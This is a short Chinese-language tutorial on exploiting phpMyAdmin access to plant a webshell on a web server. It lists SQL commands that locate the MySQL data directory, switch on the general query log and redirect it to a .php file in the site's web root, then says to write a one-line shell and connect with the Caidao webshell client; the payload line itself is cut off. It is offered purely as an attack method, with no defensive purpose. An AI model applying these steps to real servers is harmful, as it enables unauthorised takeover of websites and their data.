phpmyadmin渗透

phpmyadminx的几种渗透方式

进入phpmyadmin后查看数据库存放路径

select @@datadir;
可以直接得到数据库地址。

获得数据库地址以后可以按照数据库地址猜测网站目录，写入shell。

还有一种是利用mysql的日志文件，在mysql5.0版本以上会自动生成日志文件，通过使用日志文件来写入shell。要求对日志文件就有读写的权限。

首先查看日志状态 show variables like '%general%';
这里可以看到log文件的是关闭的，通过设置打开set global general_log='on';

然后再将日志文件设置成php文件：如set global general_log_file='D:/phpstudy_pro/WWW/xxx/log.php';
然后直接再写入一句话就可以了。比如`select ''

再使用菜刀连接即可。